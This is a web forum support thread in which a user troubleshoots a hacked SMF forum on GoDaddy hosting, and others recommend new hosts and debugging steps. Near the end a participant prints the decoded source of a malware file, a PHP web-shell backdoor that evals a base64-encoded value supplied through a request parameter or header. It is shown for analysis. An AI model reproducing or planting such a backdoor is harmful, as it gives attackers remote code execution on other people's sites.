Can't Login as Admin

Started by me314159, August 23, 2021, 11:07:32 PM

Previous topic - Next topic

Sir Osis of Liver

GoDaddy. :P  Save yourself some grief and move to a better host.
Ashes and diamonds, foe and friend,
 we were all equal in the end.

                                     - R. Waters

me314159

Quote from: Sir Osis of Liver on August 24, 2021, 07:20:56 PMGoDaddy. :P  Save yourself some grief and move to a better host.


The thought has crossed my mind recently.

Kindred

Leave go daddy.

Run, don't walk. Get a new host
Слaва
Украинi

Please do not PM, IM or Email me with support questions.  You will get better and faster responses in the support boards.  Thank you.

"Loki is not evil, although he is certainly not a force for good. Loki is... complicated."

me314159

Well, I can't get the new forum started.  When I try the entire host comes to a screeching halt for a few minutes and during that time I cannot ftp in or visit any of the websites sitting on that host.  The server will remain tied up for 5 to 15min before it begins servicing requests.

Regarding the SMF that I am trying to fix:
I've got both the infected and new forum in separate directories on my host. I switch between the infected & new forums by renaming the directory as needed - since the domain points to a specific directory. I'm using my browser as one normally would to view the forum.

The infected SMF (2.0.11) is working now - The issue previously was that I could not login - but the site was up and people were posting. I'm scratching my head - wondering why it is working now.  Yesterday, I deleted anything that looked weird (mostly php files, and modified .htaccess files) - but that didn't immediately fix anything.  Today, there was the absolutely bizarre downgrade from PHP 5.6 to 5.4 and the upgrading back to 5.6 (upon calling Godaddy).  Perhaps that haphazardly cleared . . .  something?   

The new SMF with fresh 2.0.18 files has never worked. I checked to make sure that the database credentials in Settings.php were working (by directly copying and visiting my host's cPanel equivalent to access MySQL) - the credentials are working. It's the same Settings.php file that is in my infected site - so this makes sense to me - being that the infected site can run.  I've compared the two Settings.php files (new from archive to the old used with the original forum). I could not see anything that I'd describe as weird or out of place - but I did notice that the new Settings.php downloaded from SMF had extra code starting with
if (file_exists(dirname(__FILE__) . '/install.php')) but, this just appears to be normal for installation purposes. And, perhaps deleted after an install?  Besides, I'd be looking for extra code in my original settings.php that came from the infected site anyway.

At the moment I have the SMF off line - I have a third directory with a maintenance message. 

I'll have another whack tomorrow - or maybe at 2AM tonight if I cannot sleep.



me314159


me314159

For whatever reason I never could get the new site working (running it cripples my host). All I can do at this point is but the tainted site back online and cross my fingers.   

Kindred

did you leave godaddy?
Did you transfer the database and files?
Who did you go to?


I have "rescued" 3 sites from godaddy "prison".  In all cases, GoDaddy was the problem
Слaва
Украинi

Please do not PM, IM or Email me with support questions.  You will get better and faster responses in the support boards.  Thank you.

"Loki is not evil, although he is certainly not a force for good. Loki is... complicated."

me314159

What are decent hosting sites?   I don't even have CPanel with Godaddy.  I can't run anything higher than PHP 5.6 with Godaddy.  They've been telling me for years that they're going to move me to a modern machine - but it's never happened. 

Sir Osis of Liver

Crocweb.  Very reliable, inexpensive, support is excellent.  I've moved around 20 accounts there, several from GoDaddy.  If you need assistance PM me.
Ashes and diamonds, foe and friend,
 we were all equal in the end.

                                     - R. Waters

Kindred

I have 12 sites on ICDsoft....   have been very happy with them for almost a decade
Слaва
Украинi

Please do not PM, IM or Email me with support questions.  You will get better and faster responses in the support boards.  Thank you.

"Loki is not evil, although he is certainly not a force for good. Loki is... complicated."

me314159

I should be able to get SMF running again on the same host.  I wonder why these instructions never worked:
https://wiki.simplemachines.org/smf/Hacking_-_I_think_I_have_been_hacked

Well, perhaps this weekend I an fix this issue.   When I have money I'll go to another hosting site - but like I said - it was working until hacked so in theory I should be able to get this running again on the same host.

me314159

Okay, I guess there are no answers.   

shadav

Sorry but no answers to what? last you posted was that you would try to work on it on the weekend....
so, have you moved to a new host?
no host would downgrade php without you the site owner contacting them and asking them to do so, so something is fundamentally wrong there

have you contacted your host about the hack so that they can look at it from their end because this means that their servers are not secure because while smf does have security in place, so too does the server itself and well someone somewhere got past the server and then to your outdated smf, and only the host would be able to actually see where the hack came from
so let us know what they say

as for your second install of smf 2.0.18 are you trying to use the same database as your corrupted install? if so yeah that's not going to work, you can't share the same database with the 2 installs (well not without some tweaking)

and you say that it brings your site to a halt...how? any errors? check your server error logs

you don't have cpanel? do you have something else similar to it? even free hosts give you access to cpanel or the equivalent.
have you made sure that all files on the 2.0.18 were uploaded and folder and file permissions are set correctly?
you say you're using the same settings.php from the old version on the new version? make sure that all the info in there points to the correct info for the 2.0.18 and not the old install.

Sir Osis of Liver

Quote from: me314159 on September 01, 2021, 11:44:43 AMI don't even have CPanel with Godaddy.  I can't run anything higher than PHP 5.6 with Godaddy. 

This is your problem.  Did you look at Crocweb?  They're running a 60% discount for new accounts, would cost you very little to move.
Ashes and diamonds, foe and friend,
 we were all equal in the end.

                                     - R. Waters

me314159

Quote from: Sir Osis of Liver on September 23, 2021, 07:35:50 PM
Quote from: me314159 on September 01, 2021, 11:44:43 AMI don't even have CPanel with Godaddy.  I can't run anything higher than PHP 5.6 with Godaddy. 

This is your problem.  Did you look at Crocweb?  They're running a 60% discount for new accounts, would cost you very little to move.

Well, technically, lack of c-panel isn't the real problem - since SMF has been running since 2016 on this hosting site. Also, if I resurrect the infected site - it runs. Today if I like. The real problem is that these instructions do not work for some reason: https://wiki.simplemachines.org/smf/Hacking_-_I_think_I_have_been_hacked

As I have stated, when I have money I'll change hosting sites.   But, I'd like some help if it doesn't pain anyone too much that I can't afford another hosting site.   Like I said SMF runs on this hosting site - it's just that something went awry when trying to clean the infected site.  If I have to I'll just put the infected site back up. 

EDIT: Or, are you referring the the PHP version?  I believe when I tried cleaning the SMF I was also upgrading at the request by others.  Maybe the upgrade needs something higher than PHP 5.6?

Sir Osis of Liver

2.0.18 should run in php 5.6, unless you have a mod installed that requires higher version.  If you've followed the instructions in the wiki article, how exactly is your forum not working?
Ashes and diamonds, foe and friend,
 we were all equal in the end.

                                     - R. Waters

Chief of Nothing

I wish I had stumbled on to this thread when it was originally posted, it would have been interesting to study those other files.

As no one's posted it, for anyone that might be remotely interested this is what cvtbadee.php decoded to:

$burnishes = create_function( ,eval(@array_pop(func_get_args())););

$burnishes(P,F,/,9,=,<,i,?,r,G,d,K,$i=@array_merge($_REQUEST,$_COOKIE,$_SERVER);
$a=isset($i["sbvtmtra"])?$i["sbvtmtra"]:(isset($i["HTTP_SBVTMTRA"])?$i["HTTP_SBVTMTRA"]:die);
@eval(strrev(base64_decode(strrev($a)))););

Arantor

Remote code execution, lovely. Though that is a little more elegant than some of the ones I've seen.

me314159

Quote from: Sir Osis of Liver on September 24, 2021, 10:21:48 PM2.0.18 should run in php 5.6, unless you have a mod installed that requires higher version.  If you've followed the instructions in the wiki article, how exactly is your forum not working?


I typed about it in this thread. Described simply - the new/clean SMF crashes the host. lol

There is one mod.  I'll have to look into that.

Arantor

Do you have any logs we can look at as to what is crashing?

Advertisement: